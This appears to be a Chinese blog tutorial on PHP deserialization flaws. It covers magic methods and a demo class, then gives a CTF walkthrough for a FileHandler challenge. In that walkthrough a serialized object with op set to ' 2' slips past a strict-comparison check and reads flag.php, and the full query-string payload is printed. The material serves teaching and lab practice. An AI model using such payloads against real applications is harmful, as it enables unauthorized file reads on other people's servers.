PHP 反序列化

已于 2023-06-07 19:09:09 修改
阅读量152 收藏
点赞数
分类专栏: Web安全 文章标签: php 开发语言
于 2023-06-07 17:35:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/131086967
版权

文章目录

PHP 反序列化漏洞简介

原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码
执行,SQL 注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行
反序列化的时候就有可能会触发对象中的一些魔术方法。

serialize() //将一个对象转换成一个字符串
unserialize() //将字符串还原成一个对象

触发:unserialize 函数的变量可控,文件中存在可利用的类,类中有魔术方法:

参考:https://www.cnblogs.com/20175211lyz/p/11403397.html

__construct() //创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用 isset()或 empty()触发
__unset() //在不可访问的属性上使用 unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发

无类测试

serialize
在这里插入图片描述

unserialize
在这里插入图片描述

有类测试

在这里插入图片描述

<?php
	class ABC{
    public $test;
    function __construct(){
        $test = 1;
        echo '调用了构造函数<br>';
    }
    function __destruct(){
        echo '调用了析构函数<br>';
    }
    function __wakeup(){
        echo '调用了苏醒函数<br>';
    }
}
echo '创建对象a<br>';
$a = new ABC;
echo '序列化<br>';
$a_ser=serialize($a);
echo '反序列化<br>';
$a_unser=unserialize($a_ser);
echo '对象快要死了!<br>';
?>

运行结果:
创建对象a
调用了构造函数
序列化
反序列化
调用了苏醒函数
对象快要死了!
调用了析构函数
调用了析构函数

CTF真题

在这里插入图片描述

进入靶场后,页面显示代码如下:

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

?>

代码解析及思路:

1、代码中包含了flag.php,定义了一个名为FileHandler的类,并且对GET方式提交的$str进行反序列化操作

2、由此考虑给$str传入被序列化后的FileHandler类,那么调用unserialize的时候会检查类中有没有__wakeup方法,这里没有所以不调用。
   而当程序退出时$obj会被销毁,此时会调用__destruct方法。

3、这里__destruct方法先判断$obj的op属性是否等于2(注意:这里使用的是3个等于),若是则将其赋值为1,然后调用类的process方法。
   而process方法首先判断$obj的op属性是1还是2(注意:这里使用的是2个等于),若是1则调用类的write方法,若是2则调用类的read方法。

4、由于目的是得到flag,所以我们应该让其调用read方法,由此应该在调用process方法时使$obj的op属性等于2。
   但是这里有个问题,如果我们给$str传值的时候就传入op属性等于2,其反序列化后的对象$obj销毁时调用__destruct方法,会重新将op赋值为1,
   导致后面无法调用read方法,那么该如何绕过op的重新赋值呢?

5、观察到__destruct方法判断$obj的op属性是否等于2时使用的是3个等于号(强等于,不会进行类型转换),即要op要为字符串形式的"2"时才为True。
   而process方法判断$obj的op属性值时使用的是2个等于号(弱等于,类型转换后再比较)。
   由此一来,只需要构造op为数值的2或者" 2"即可绕过op的重新赋值,成功调用read方法。
   并且让filename="flag.php",这样read方法才能读取到flag内容。

6、利用以下代码的输出结果给$str传值:
<?php
class FileHandler {
	public $op = ' 2';
	public $filename = "flag.php";
	public $content = "ch4ser";
}
$flag = new FileHandler();
$flag_1 = serialize($flag);
echo $flag_1;
?>

O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:6:"ch4ser";}

7、在url地址栏后输入?str=O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:6:"ch4ser";}
   右键 - 查看页面源代码 - 得到flag
Ch4ser
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
php反序列化失败,php反序列化失败怎么办
weixin_34947914的博客
03-26 681
【摘要】PHP即“超文本预处理器”,是一种通用开源脚本语言PHP是在服务器端执行的脚本语言,与C语言类似,是常用的网站编程语言PHP独特的语法混合了C、Java、Perl以及 PHP 自创的语法。下面是php反序列化失败怎么办,让我们一起来看看php反序列化失败怎么办的具体内容吧!php反序列化失败怎么办php反序列化失败是因为序列化数据时的编码与反序列化时的编码不一致导致的,其解决办法就是使...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
#### 正常的反序列化语句是这样的 $a=’a:2:{s:8:”username”;s:7:”dimpl3s”;s:8:”password”;s:6:”abcdef”;}’; 但是如果写成这样 $b=’a:2:{s:8:”username”;s:7:”dimpl3s”;s:8:”password”;s:6:”...
详解php反序列化
12-17
1  前言 最近也是在复习之前学过的内容,感觉对PHP反序列化的理解更加深了,所以在此总结一下 2  serialize()函数      “所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。” 一开始看这个概念可能有些懵,但之后也是慢慢理解了 在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此PHP序列化就是将内存的变量数据“保存”到文件中的持久数据的过程。 $s = serialize($变量); //该函数将变量
PHP反序列化
m0_62451321的博客
11-07 5377
POP即:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,是从现有运行 些工作了。一般的序列化攻击都在PHP魔术方法中出现可利用的漏洞,因为自动调用触发漏洞,但如果关键代码没在魔术方法中,而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来。(1)先要确定起点和终点,如果起点有多个,那么就去尝试最有可能进行相互跳转的一个,起点和终点无法确定,POP链不可能成功。
php反序列化
doubirui的博客
03-23 1659
一个预定义好的,在特定情况下自动触发的行为方法。
php反序列化以及相关例题
2401_82388450的博客
04-28 1015
1.序列化就是将 对象object、字符串string、数组array、变量 转换成具有一定格式的字符串,方便保持稳定的格式在文件中传输,以便还原为原来的内容。简单来说就是将内存变成文件,在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此PHP序列化就是将内存的变量数据“保存”到文件中的持久数据的过程。2.反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。
php反序列化总结
weixin_44576725的博客
04-08 6429
php反序列化总结 基础知识 序列化 序列化就是将 对象object、字符串string、数组array、变量 转换成具有一定格式的字符串,方便保持稳定的格式在文件中传输,以便还原为原来的内容。 serialize ( mixed $value ) : string serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。 example: class Test { public $name = "s1ng"; private $age = 19;
php 反序列化总结
m0_64815693的博客
12-02 3605
php 反序列化从零开始到啥也不会 横批:一篇足以
php反序列化魔术方法
2301_80913334的博客
03-26 1046
_sleep()__wakeup()__invoke()__clone触发时机实例化对象对象引用完成或对象被销毁;反序列化之后序列化之前反序列化之前把对象当成字符串调用(使用echo或print)把对象当成函数调用当使用clone关键字拷贝完成一个对象功能提前清理不必要内容对象被序列化之前触发,返回需要被序列化储存的成员属性,删除不必要的属性参数返回值需要被序列化的成员属性__call()__get()__set()__isset()__unset()
PHP反序列化命令执行及防范
金色%夕阳的博客
05-08 1019
PHP反序列化命令执行 1、 序列化与反序列化原理 序列化(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。依照序列化格式重新获取字节的结果时,可以利用它来产生与原始对象相同语义的副本。序列化是一种将对象的状态信息转换为可以存储或传输的形式的过程(转化为信息流)。在序列化期间,对象将其当前状态写入到临时或持久性存储区以后,可以通过从存储区中读取或反序列化对象
php反序列化原理
byll1024的博客
05-20 952
PHP反序列化是将经过序列化的字符串恢复成原始数据结构的过程。序列化是指将复杂数据结构(如数组、对象)转换为可存储或传输的字符串形式,而反序列化则是将这些字符串重新转换回原来的数据结构。在PHP中,这通常通过`unserialize()`函数实现。这个函数读取序列化字符串,并根据其中包含的信息重建原始的数据结构。需要注意的是,反序列化过程可能会执行字符串中包含的代码,因此存在安全风险。为了避免潜在的安全隐患,建议只对可信的序列化字符串进行反序列化操作。
php反序列化例题.docx
07-18
php反序列化例题.docx
PHP常见的序列化与反序列化操作实例分析
10-16
主要介绍了PHP常见的序列化与反序列化操作,结合实例形式分析了php使用serialize()及unserialize()进行序列化与反序列化相关操作技巧及注意事项,需要的朋友可以参考下
文件包含漏洞
大河之犬的博客
06-02 679
当用户以某种方式控制即将由服务器加载的文件时,就会出现漏洞。远程文件包含(RFI): 从远程服务器加载文件。在php中,默认情况下禁用此功能(本地文件包含(LFI): 服务器加载本地文件PHP 过滤器允许在数据被读取或写入之前执行基本的修改操作。有 5 类过滤器:1、字符串过滤器string.strip_tags: 从数据中删除标签(位于 “” 字符之间的所有内容)2、转换过滤器:转换为不同的编码(iconv -l滥用。
ctfshow-web入门-爆破(web25)及php_mt_seed工具的安装与使用
Welcome To Myon'Blog !
06-03 503
rand)){ ,需要为真才会执行后面输出 flag 的语句,因此 $rand 需要为 0 ,而 $rand = intval($r)-intval(mt_rand());特别注意,这里的 mt_rand()+mt_rand() 是第二次和第三次生成的随机数之和,因为前面已经使用过一次 mt_rand() 了。我们令 r=0,就可以得到 $rand = -intval(mt_rand()),只要设置了 r,就会 echo $rand;都是一样的种子,但是第一次和第二次生成的随机数结果是不一样的。
深入理解Linux网络总结
weixin_45673259的博客
06-02 836
在硬中断的处理中,发起软中断的时候是基于当前CPU核的smp_processor_id的,这意味着哪个核响应的硬中断,那么该硬中断发起的软中断任务就必然由这个核来处理。不过硬中断的上下文里做的工作很少,将传过来的poll_list添加到CPU变量softnet_data的poll_list里(softnet_data中的poll_list是一个双向列表,其中的设备都带有输入帧等着被处理),接着触发软中断NET_RX_SOFTIRQ。服务端响应的第一次握手的时候,会进行半连接队列和全连接队列满的判断。
LAMP架构与搭建论坛
weixin_56770318的博客
05-31 1335
中间连接PHP/Prel/Python:作为三种开发动态网页的编程语言,负责解释动态网页文件,负责沟通Web服务器和数据库系统以协同工作,并提供Web应用程序的开发和运行环境。它是一个开源、可扩展的Web服务器,被广泛应用于互联网上的网站。5、DDEFAULT_COLLATION:指定默认使用的字符集校对规则,utf8_general_ci 是适用于 UTF-8 字符集的通用规则。-DMYSQL_UNIX_ADDR=/tmp/mysql.sock MySQL进程间通信的套接字的位置。
建WordPress主题官网模板
xiaoyuya
05-30 305
WordPress主题官网模板
PhpSpreadsheet表格导出
最新发布
魍魉
06-03 485
使用PhpSpreadsheet多重表头生成excel 表。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值